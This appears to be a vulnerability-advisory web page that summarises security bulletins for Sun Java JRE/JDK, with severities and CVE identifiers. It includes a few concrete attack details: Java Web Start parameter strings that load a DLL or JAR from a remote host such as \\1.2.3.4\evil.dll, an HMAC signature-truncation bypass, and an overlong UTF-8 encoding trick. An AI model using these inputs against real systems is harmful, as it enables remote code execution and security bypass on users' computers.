The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Sun Java

security vulnerability CVE-2010-0887

Java JRE/JDK 6: code execution via Java Plug-in

Synthesis of the vulnerability

An attacker can create an HTML page containing a malicious Java applet, in order to execute code on victim's computer.
Severity: 3/4.
Creation date: 16/04/2010.
Identifiers: BID-39492, CVE-2010-0887, RHSA-2010:0356-02, RHSA-2010:0549-01, VIGILANCE-VUL-9594.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The Java Plug-in is called to display Java applets contained in an HTML page.

An unknown vulnerability of Java Plug-in can be used to execute code. Versions 6 Update 18 and 19 are impacted on Windows, Solaris and Linux, installed on a 32 bit processor.

An attacker can therefore create an HTML page containing a malicious Java applet, in order to execute code on victim's computer.
Full Vigil@nce bulletin... (Free trial)

security alert CVE-2010-0886 CVE-2010-1423

Java JRE/JDK 6: code execution via Java Deployment Toolkit

Synthesis of the vulnerability

When Java Deployment Toolkit is installed, an attacker can create an HTML document executing Java code or a shell command.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 2.
Creation date: 12/04/2010.
Revision date: 15/04/2010.
Identifiers: 2508272, BID-39346, CVE-2010-0886, CVE-2010-1423, MS11-027, RHSA-2010:0356-02, VIGILANCE-VUL-9569, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#886582.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The Java Deployment Toolkit is installed as an ActiveX (Internet Explorer) or a NPAPI plugin (Firefox), in order to distribute Java applications, using JNLP files.

The launch() method or the launchjnlp parameter of Java Deployment Toolkit indicate parameters to transmit to Java Web Start.

However, Java Web Start accepts some dangerous parameters:
 - to load a DLL: -J-XXaltjvm=\\1.2.3.4\evil.dll
 - to use a JAR archive: -J-jar -J\\1.2.3.4\exploit.jar

An attacker can therefore create an HTML document, calling Java Deployment Toolkit, and the Java Web Start, in order to execute code.
Full Vigil@nce bulletin... (Free trial)

security vulnerability CVE-2009-3555 CVE-2009-3910 CVE-2010-0082

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 5.
Creation date: 31/03/2010.
Identifiers: BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39093, BID-39094, BID-39095, BID-39096, BID-39559, c02122104, c03405642, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-192, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CERTA-2012-AVI-395, CVE-2009-3555, CVE-2009-3910, CVE-2010-0082, CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, FEDORA-2010-6025, FEDORA-2010-6039, FEDORA-2010-6279, HPSBMU02799, HPSBUX02524, javacpumar2010, MDVSA-2010:084, RHSA-2010:0337-01, RHSA-2010:0338-01, RHSA-2010:0339-01, RHSA-2010:0383-01, RHSA-2010:0408-01, RHSA-2010:0471-01, RHSA-2010:0489-01, RHSA-2010:0574-01, RHSA-2010:0586-01, RHSA-2010:0865-02, SSRT100089, SSRT100867, SUSE-SA:2010:026, SUSE-SA:2010:028, SUSE-SR:2010:008, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:017, VIGILANCE-VUL-9550, VMSA-2011-0003, VMSA-2011-0003.1, VMSA-2011-0003.2, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK. The most severe vulnerabilities lead to code execution.

Twenty four vulnerabilities lead to code execution. [severity:3/4; BID-39062, BID-39065, BID-39067, BID-39068, BID-39069, BID-39070, BID-39071, BID-39072, BID-39073, BID-39075, BID-39077, BID-39078, BID-39081, BID-39082, BID-39083, BID-39084, BID-39085, BID-39086, BID-39088, BID-39089, BID-39090, BID-39091, BID-39094, CERTA-2009-AVI-528, CERTA-2010-AVI-149, CERTA-2010-AVI-196, CERTA-2010-AVI-239, CERTA-2010-AVI-241, CERTA-2010-AVI-276, CERTA-2010-AVI-365, CERTA-2010-AVI-513, CERTA-2010-AVI-573, CERTA-2011-AVI-253, CERTA-2012-AVI-241, CVE-2009-3555, CVE-2010-0082, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0090, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849, CVE-2010-0850, VU#507652, ZDI-10-051, ZDI-10-052, ZDI-10-053, ZDI-10-054, ZDI-10-055, ZDI-10-056, ZDI-10-057, ZDI-10-059, ZDI-10-060, ZDI-10-061]

An attacker can obtain sensitive information. [severity:2/4; BID-39093, CERTA-2010-AVI-192, CVE-2010-0084]

An attacker can generate a denial of service of Java Web Start. [severity:2/4; BID-39095, CVE-2010-0089]

An attacker can obtain sensitive information. [severity:2/4; BID-39096, CVE-2010-0091]

A buffer overflow of HsbParser.getSoundBank() leads to code execution. [severity:3/4; BID-39559, CVE-2009-3910]
Full Vigil@nce bulletin... (Free trial)

computer vulnerability announce CVE-2009-2625

Apache Xerces2 Java, Java JRE/JDK, OpenJDK: memory corruption via XML

Synthesis of the vulnerability

An attacker can create XML data containing a malicious byte which corrupts the memory, in order to create a denial of service or to execute code in Apache Xerces2 Java, Java JRE/JDK or OpenJDK.
Severity: 3/4.
Creation date: 10/08/2009.
Revision date: 09/12/2009.
Identifiers: 272209, 6870754, BID-35958, CVE-2009-2625, DSA-1984-1, FICORA #245608, HPSBUX02476, MDVSA-2011:108, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1505-01, RHSA-2009:1582-01, RHSA-2009:1615-01, RHSA-2011:0858-01, RHSA-2012:0725-01, RHSA-2012:1232-01, RHSA-2012:1537-01, RHSA-2013:0763-01, SSA:2011-041-02, SSRT090250, SUSE-SR:2009:014, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:011, SUSE-SR:2010:013, SUSE-SR:2010:014, SUSE-SR:2010:015, VIGILANCE-VUL-8925.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The Apache Xerces2 Java, Java JRE/JDK and OpenJDK products manage XML data. They share the same vulnerability.

An attacker can create XML data containing a malicious byte which corrupts the memory, in order to create a denial of service or to execute code in these products.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin CVE-2009-3728 CVE-2009-3729 CVE-2009-3864

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 04/11/2009.
Revision date: 12/11/2009.
Identifiers: 269868, 269869, 269870, 270474, 270475, 270476, 6631533, 6636650, 6657026, 6657138, 6664512, 6815780, 6822057, 6824265, 6854303, 6862968, 6862969, 6862970, 6863503, 6864911, 6869694, 6869752, 6870531, 6872357, 6872358, 6872824, 6874643, BID-36881, c01997760, c03005726, c03405642, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CERTA-2012-AVI-395, CVE-2009-3728, CVE-2009-3729, CVE-2009-3864, CVE-2009-3865, CVE-2009-3866, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877, CVE-2009-3879, CVE-2009-3880, CVE-2009-3881, CVE-2009-3882, CVE-2009-3883, CVE-2009-3884, CVE-2009-3886, FEDORA-2009-11486, FEDORA-2009-11490, HPSBMU02703, HPSBMU02799, HPSBUX02503, MDVSA-2010:084, RHSA-2009:1560-01, RHSA-2009:1571-01, RHSA-2009:1584-01, RHSA-2009:1643-01, RHSA-2009:1647-01, RHSA-2009:1662-01, RHSA-2009:1694-01, RHSA-2010:0043-01, RHSA-2010:0408-01, SSRT100019, SSRT100242, SSRT100867, SUSE-SA:2009:058, SUSE-SA:2010:002, SUSE-SA:2010:003, SUSE-SA:2010:004, VIGILANCE-VUL-9156, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, ZDI-09-076, ZDI-09-077, ZDI-09-078, ZDI-09-079, ZDI-09-080.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK.

The Java Update mechanism on non-english versions does not update the JRE when a new version is available. [severity:1/4; 269868, 6869694, BID-36881, CVE-2009-3864]

A command execution vulnerability in the Java Runtime Environment Deployment Toolkit can be used in order to execute arbitrary code. [severity:3/4; 269869, 6869752, BID-36881, CVE-2009-3865]

A vulnerability in the Java Web Start Installer may be leveraged to allow untrusted Java Web Start Application to run as a trusted application. [severity:3/4; 269870, 6869752, 6872824, BID-36881, CVE-2009-3866, ZDI-09-077]

Multiple buffer and integer overflow vulnerabilities in the Java Runtime Environment with processing audio and image files may allow an untrusted applet or Java Web Start application to escalate privileges. [severity:3/4; 270474, 6854303, 6862968, 6862969, 6862970, 6872357, 6872358, 6874643, BID-36881, CERTA-2011-AVI-523, CERTA-2011-AVI-651, CVE-2009-3867, CVE-2009-3868, CVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, ZDI-09-076, ZDI-09-078, ZDI-09-079, ZDI-09-080]

A security vulnerability in the Java Runtime Environment with verifying HMAC digests may allow authentication to be bypassed. [severity:3/4; 270475, 6863503, BID-36881, CVE-2009-3875]

A vulnerability in the Java Runtime Environment with decoding DER encoded data may allow a remote client to cause the JRE on the server to run out of memory, resulting in a DoS (Denial of Service) condition. [severity:3/4; 270476, 6864911, BID-36881, CVE-2009-3876]

A vulnerability in the Java Runtime Environment with parsing HTTP headers may allow a remote client to cause the JRE on the server to run out of memory, resulting in a DoS (Denial of Service) condition. [severity:3/4; 270476, 6864911, BID-36881, CVE-2009-3877]

An attacker can use the ICC_Profile.getInstance() method to detect if a file is present. [severity:1/4; 6631533, CVE-2009-3728]

An attacker can use a TrueType font, in order to generate a denial of service. [severity:1/4; 6815780, CVE-2009-3729]

An attacker can use a vulnerability of X11 and Win32GraphicsDevice. [severity:2/4; 6822057, CVE-2009-3879]

An attacker can use Component, KeyboardFocusManager and DefaultKeyboardFocusManager of AWT (Abstract Window Toolkit), in order to obtain sensitive data. [severity:2/4; 6664512, CVE-2009-3880]

An attacker can obtain information via ClassLoader. [severity:3/4; 6636650, CVE-2009-3881]

An attacker can obtain information via Swing. [severity:2/4; 6657026, CVE-2009-3882]

An attacker can obtain information via Windows Pluggable Look and Feel. [severity:2/4; 6657138, CVE-2009-3883]

An attacker can use the TimeZone.getTimeZone() method to detect if a file exists. [severity:2/4; 6824265, CVE-2009-3884]

An attacker can use a vulnerability of a signed JAR. [severity:2/4; 6870531, CVE-2009-3886]
Full Vigil@nce bulletin... (Free trial)

computer threat note CVE-2009-0217 CVE-2009-0901 CVE-2009-1896

Java JRE/JDK/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Java JRE/JDK/SDK can be used by a malicious applet/application in order to execute code or to obtain information. A legitimate applet/application, handling malicious data, can also be forced to execute code.
Severity: 3/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 05/08/2009.
Revision date: 07/08/2009.
Identifiers: 263408, 263409, 263428, 263429, 263488, 263489, 263490, 264648, 6406003, 6429594, 6444262, 6446522, 6738524, 6755840, 6782979, 6801071, 6801497, 6805231, 6818787, 6823373, 6824440, 6830335, 6845701, 6848964, 6849518, 6862844, BID-35671, BID-35828, BID-35830, BID-35832, BID-35922, BID-35939, BID-35942, BID-35943, BID-35944, BID-35945, BID-35946, BID-35958, CERTA-2009-AVI-279, CERTA-2009-AVI-300, CERTA-2009-AVI-312, CERTA-2009-AVI-365, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-452, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CERTA-2010-AVI-253, CVE-2009-0217, CVE-2009-0901, CVE-2009-1896, CVE-2009-2475, CVE-2009-2476, CVE-2009-2493, CVE-2009-2495, CVE-2009-2625, CVE-2009-2670, CVE-2009-2671, CVE-2009-2672, CVE-2009-2673, CVE-2009-2674, CVE-2009-2675, CVE-2009-2676, CVE-2009-2689, CVE-2009-2690, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724, FEDORA-2009-8329, FEDORA-2009-8337, HPSBUX02476, MDVSA-2009:209, RHSA-2009:1199-01, RHSA-2009:1200-01, RHSA-2009:1201-01, RHSA-2009:1236-01, RHSA-2009:1582-01, RHSA-2009:1662-01, RHSA-2010:0043-01, SSRT090250, SUSE-SA:2009:043, SUSE-SA:2009:053, SUSE-SR:2009:016, SUSE-SR:2009:017, SUSE-SR:2010:012, SUSE-SR:2010:015, VIGILANCE-VUL-8916, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3, VU#456745, VU#466161, ZDI-09-049, ZDI-09-050.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Several vulnerabilities were announced in Java JRE/JDK/SDK.

A vulnerability of the audio system can be used to access to "java.lang.System" properties. [severity:1/4; 263408, 6738524, BID-35939, CERTA-2009-AVI-365, CVE-2009-2670]

When a SOCKS proxy is used, an applet/application can determine the name of the current user. [severity:2/4; 263409, 6801071, BID-35943, CVE-2009-2671]

When a proxy is used, an applet/application can read cookies. [severity:3/4; 263409, 6801071, BID-35943, CVE-2009-2672]

When a proxy is used, a malicious applet/application can connect to a server different than its origin server. [severity:2/4; 263409, 6801497, BID-35943, CVE-2009-2673]

When a malicious JPEG image is parsed by a Java applet/application, an integer overflow occurs, and leads to code execution. [severity:3/4; 263428, 6823373, BID-35942, CVE-2009-2674, ZDI-09-050]

The XMLDsig recommendation allows an attacker to bypass the signature of an XML document (VIGILANCE-VUL-8864). [severity:3/4; 263429, 6824440, BID-35671, CERTA-2009-AVI-279, CERTA-2009-AVI-452, CERTA-2010-AVI-253, CVE-2009-0217, VU#466161]

When a malicious Unpack200 archive is opened by the JAR utility in a Java applet/application, an integer overflow occurs, and leads to code execution. [severity:3/4; 263488, 6830335, BID-35944, CVE-2009-2675, ZDI-09-049]

An attacker can create malformed XML data, in order to corrupt the memory (VIGILANCE-VUL-8925). [severity:3/4; 263489, 6845701, BID-35958, CERTA-2009-AVI-312, CVE-2009-2625]

A malicious applet can use JNLPAppletLauncher to upload and execute another applet. [severity:3/4; 263490, 6782979, BID-35946, CVE-2009-2676]

The Java Web Start ActiveX uses a vulnerable version of the Active Template Library (VIGILANCE-VUL-8895). [severity:3/4; 264648, 6862844, BID-35828, BID-35830, BID-35832, BID-35945, CERTA-2009-AVI-300, CERTA-2009-AVI-435, CERTA-2009-AVI-440, CERTA-2009-AVI-516, CERTA-2009-AVI-538, CERTA-2010-AVI-083, CVE-2009-0901, CVE-2009-2493, CVE-2009-2495, VU#456745]

Some versions of WebStart execute unsigned code. [severity:3/4; CVE-2009-1896]

An attacker can use variables to obtain information. [severity:2/4; CVE-2009-2475]

An attacker can bypass access restrictions of OpenType. [severity:3/4; CVE-2009-2476]

An attacker can use JDK13Services to access to some objects. [severity:2/4; CVE-2009-2689]

An attacker can obtain information on private variables. [severity:2/4; CVE-2009-2690]

Several minor vulnerabilities were also announced. [severity:2/4; 6406003, 6429594, 6444262, 6446522, 6755840, 6805231, 6818787, 6848964, 6849518, CVE-2009-2716, CVE-2009-2717, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720, CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724]
Full Vigil@nce bulletin... (Free trial)

vulnerability note CVE-2009-0217

XML: bypassing signature

Synthesis of the vulnerability

The XMLDsig recommendation allows an attacker to bypass the signature of an XML document.
Severity: 3/4.
Creation date: 15/07/2009.
Identifiers: 269208, 47526, 6868619, 981343, BID-35671, CVE-2009-0217, DSA-1849-1, FEDORA-2009-8121, FEDORA-2009-8157, FEDORA-2009-8456, FEDORA-2009-8473, HPSBUX02476, MDVSA-2009:267, MDVSA-2009:268, MDVSA-2009:269, MDVSA-2009:318, MDVSA-2009:322, MS10-041, PK80596, PK80627, RHSA-2009:1428-01, SSRT090250, VIGILANCE-VUL-8864, VU#466161.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The W3C XMLDsig (XML Signature Syntax and Processing) recommendation indicates how to sign XML documents.

HMAC algorithms are used to sign a document, with a key and a hash algorithm.

The XMLDsig ds:HMACOutputLength parameter indicates the number of hash bits which is used on signed data. The recipient of the XML document thus only checks these first bits of the hash.

However, the specification does not define a minimum size. An attacker can therefore send a document signed with a ds:HMACOutputLength value of one, in order to force the recipient to check only one bit.

Several XMLDsig implementation honoured the recommendation, and do not impose a minimum. These implementations are thus vulnerable.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability alert 8662

Java: memory corruption

Synthesis of the vulnerability

A malicious Java applet can corrupt the memory in order to execute code.
Severity: 3/4.
Creation date: 22/04/2009.
Identifiers: TZO-12-200, VIGILANCE-VUL-8662.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

A malicious Java applet can corrupt the memory in order to execute code.
Full Vigil@nce bulletin... (Free trial)

computer threat note CVE-2006-2426 CVE-2009-1093 CVE-2009-1094

Java JDK/JRE/SDK: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities were announced in Java JDK/JRE/SDK.
Severity: 4/4.
Number of vulnerabilities in this bulletin: 16.
Creation date: 26/03/2009.
Identifiers: 254569, 254570, 254571, 254608, 254609, 254610, 254611, 6522586, 6630639, 6632886, 6636360, 6646860, 6706490, 6717680, 6724331, 6737315, 6782871, 6792554, 6798948, 6804996, 6804997, 6804998, 6804999, BID-34240, c01745133, c01805643, CERTA-2010-AVI-043, CERTA-2010-AVI-217, CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, CVE-2009-1107, DSA-1769-1, FEDORA-2009-3058, HPSBMA02445, HPSBUX02429, MDVSA-2009:137, MDVSA-2009:162, RHSA-2009:0377-01, RHSA-2009:0392-01, RHSA-2009:0394-01, RHSA-2009:1038-01, RHSA-2009:1198-02, RHSA-2009:1662-01, SSRT090058, SUSE-SA:2009:016, SUSE-SA:2009:029, SUSE-SA:2009:036, SUSE-SR:2009:011, VIGILANCE-VUL-8564, VMSA-2009-0014, VMSA-2009-0014.1, VMSA-2009-0014.2, VMSA-2009-0016, VMSA-2009-0016.1, VMSA-2009-0016.2, VMSA-2009-0016.3, VMSA-2009-0016.4, VMSA-2009-0016.5, VMSA-2010-0002, VMSA-2010-0002.1, VMSA-2010-0002.2, VMSA-2010-0002.3.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Several vulnerabilities were announced in Java JDK/JRE/SDK.

A client can initialize a connection in a special way in order to create a denial of service on the LDAP server. [severity:2/4; 254569, 6717680, CERTA-2010-AVI-043, CVE-2009-1093]

A malicious LDAP server can create a denial of service on the client. [severity:3/4; 254569, 6737315, CVE-2009-1094]

Several overflows in the unpack200 JAR extraction utility lead to code executions. [severity:4/4; 254570, 6792554, CVE-2009-1095, CVE-2009-1096]

A malicious PNG image creates an integer overflow leading to code execution. [severity:4/4; 254571, 6804996, CVE-2009-1097]

Java Web Start displays an image when it starts ("splash screen"). A malicious GIF image creates a decoding error leading to code execution. [severity:4/4; 254571, 6804997]

A malicious GIF image creates an error during the calculation of an offset, which corrupts the memory and leads to code execution. [severity:4/4; 254571, 6804998, CVE-2009-1098]

A malicious font forces the usage of a negative integer, and then a write before the allocated buffer, which leads to code execution. [severity:4/4; 254571, 6804999]

The usage of a malicious font file consumes a large amount of disk space. [severity:2/4; 254608, 6522586]

The usage of a malicious font file consumes a large amount of disk space. [severity:2/4; 254608, 6632886]

A remote attacker can create a denial of service via HTTP on JAX-WS Service Endpoint. [severity:2/4; 254609, 6630639, CVE-2009-1101]

An error in the code generation can be used by a malicious applet to execute code on the computer. [severity:4/4; 254610, 6636360, CVE-2009-1102]

An error in the Java Plug-in deserialization can be used by an applet to execute code. [severity:4/4; 254611, 6646860, CVE-2009-1103]

JavaScript code can use the Plug-in to connect to ports of the system via LiveConnect. [severity:3/4; 254611, 6724331, CVE-2009-1104]

An applet can request to be executed on a vulnerable JRE version. [severity:2/4; 254611, 6706490, CERTA-2010-AVI-217, CVE-2009-1105]

An applet can connect to sites providing crossdomain.xml. [severity:2/4; 254611, 6798948, CVE-2009-1106]

A signed applet can obscure the content of a dialog box and invite the victim to click. [severity:1/4; 254611, 6782871, CVE-2009-1107]
Full Vigil@nce bulletin... (Free trial)

security vulnerability CVE-2008-5351

Java JDK/JRE/SDK: un-normalized UTF-8

Synthesis of the vulnerability

The UTF-8 decoder of Java JDK/JRE/SDK accepts long formats, which can be used to bypass security restrictions.
Severity: 3/4.
Creation date: 21/01/2009.
Identifiers: 245246, 4486841, CVE-2008-5351, FEDORA-2008-10860, FEDORA-2008-10913, RHSA-2008:1018-01, RHSA-2008:1025-01, RHSA-2009:0015-01, RHSA-2009:0016-01, RHSA-2009:0445-01, SUSE-SA:2009:001, SUSE-SR:2009:010, VIGILANCE-VUL-8406.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The UTF-8 encoding is used to represent Unicode characters on several bytes:
 - 1 to 7 bits : 0xxxxxxx
 - 8 to 11 bits : 110xxxxx 10xxxxxx
 - 12 to 16 bits : 1110xxxx 10xxxxxx 10xxxxxx
 - 17 to 21 bits : 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
UTF-8 limits the encoding to 4 bytes and forbids usage of more bytes than necessary.

The UTF-8 decoder of Java JDK/JRE/SDK does not check if UTF-8 encodings are normalized. For example, the "." character must only be represented as 0x2E (b00101110) and not as 0xC0-0xAE (b11000000 10101110).

An attacker can therefore use a long UTF-8 format, in order to bypass security restrictions.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about Sun Java: